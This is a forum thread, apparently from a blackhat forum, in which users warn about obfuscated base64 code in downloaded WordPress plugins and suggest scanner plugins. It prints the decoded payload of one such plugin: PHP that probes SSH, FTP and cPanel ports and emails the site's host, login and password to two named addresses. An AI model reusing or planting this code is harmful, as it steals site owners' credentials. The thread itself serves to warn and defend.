Best Blackhat Forum

I use this method to check base64 code found in a lot of wordpress plugins and scripts. A free plugin called plugin check will analyze your installed plugins and let you know if there's any base64 code, and the location of the code. Goto the code location in the plugins editor section of your wordpress dashboard. Copy the base64 code. Goto http://www.unphp.net/ and paste the code in the decoder. Read the result. Here's the result from a plugin I downloaded on another forum. I apologize, I don't remember the plugin, but here's what I got.The base64 code was:



here is what unphp.net decoded:


$domain = $_SERVER['HTTP_HOST'];
$p21 = 21;
$p22 = 22;
$p2082 = 2082;
$cp22 = fsockopen($domain,$p22,$errno,$errstr,10);
$cp21 = fsockopen($domain,$p21,$errno,$errstr,10);
$cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10);
if(!$cp22)
{$a1="Error";}
else
{$a1="Success";fclose($cp22);}
if(!$cp21)
{$a2="Error";}
else
{$a2="Success";fclose($cp21);}
if(!$cp2082)
{$a3="Error";}
else
{$a3="Success";fclose($cp2082);}
$psn ="
-------------------------------------------------------------------------

Cpanel Update Info [ Recode by Mask_magicianZ ]

-------------------------------------------------------------------------

Host : $domain

User : $login

Pass : $pass

-------------------------------------------------------------------------

Accept Port

SSH : Port $a1

FTP : Port $a2

cPanel : Port $a3

-------------------------------------------------------------------------

. 2011 Mask_magicianz Powered by RosebanditZ

-------------------------------------------------------------------------
";
$to = "quantum.princes@yahoo.com";
$recip = "john.cpbox@yahoo.com";
$subject = "cPanel AccesS Update";
$headers = "From: update";
mail($to,$subject,$psn,$headers);
mail($recip,$subject,$psn,$headers);


as you can see, this code was designed to take your password, user login, and your domain url, and email it to the email above. Wow. Anyway, I'm sure you seasoned vets already know about this, but us newbies can fall prey to it. Beware, Check everything.

Seriously, you can't be butthurt by that.. C'mon, you'd also do what it takes to protect your intellectual property. Do you honestly think he'd even touch his paying customers websites?

Very interesting indeed. Use another method myself but ends up at same point.

Sure some will find this info useful. Thanks for sharing.

Butthurt? Nah, just sharing.

Talking about this plugin?

(12-07-2013 02:26 AM)Soul Wrote: [ -> ]Talking about this plugin?

Code:

http://wordpress.org/plugins/plugin-check/

yes.

Warning message from WordPress:

Compatible up to: 3.3.2 version of WP

Thanks for sharing But Why the developer wants their customer's ID and pass without their knowledge!! Marketplace like themeforest should ban those devs.

Some other times you get fragments of code that they join all together getting the full string work as decode, just use:
TAC: http://wordpress.org/plugins/tac/
And antivirus: http://wordpress.org/plugins/antivirus/
One year old Theme Check: http://wordpress.org/plugins/theme-check/
Just check your code first before uploading to production environment.

(12-07-2013 09:53 PM)Soul Wrote: [ -> ]Warning message from WordPress:

Code:

This plugin hasn't been updated in over 2 years.
It may no longer be maintained or supported and may have compatibility
issues when used with more recent versions of WordPress.

Compatible up to: 3.3.2 version of WP

I noticed that too, but I find it still works.

---

(12-08-2013 04:22 AM)GreenPeace Wrote: [ -> ]Thanks for sharing But Why the developer wants their customer's ID and pass without their knowledge!! Marketplace like themeforest should ban those devs.

Exactly.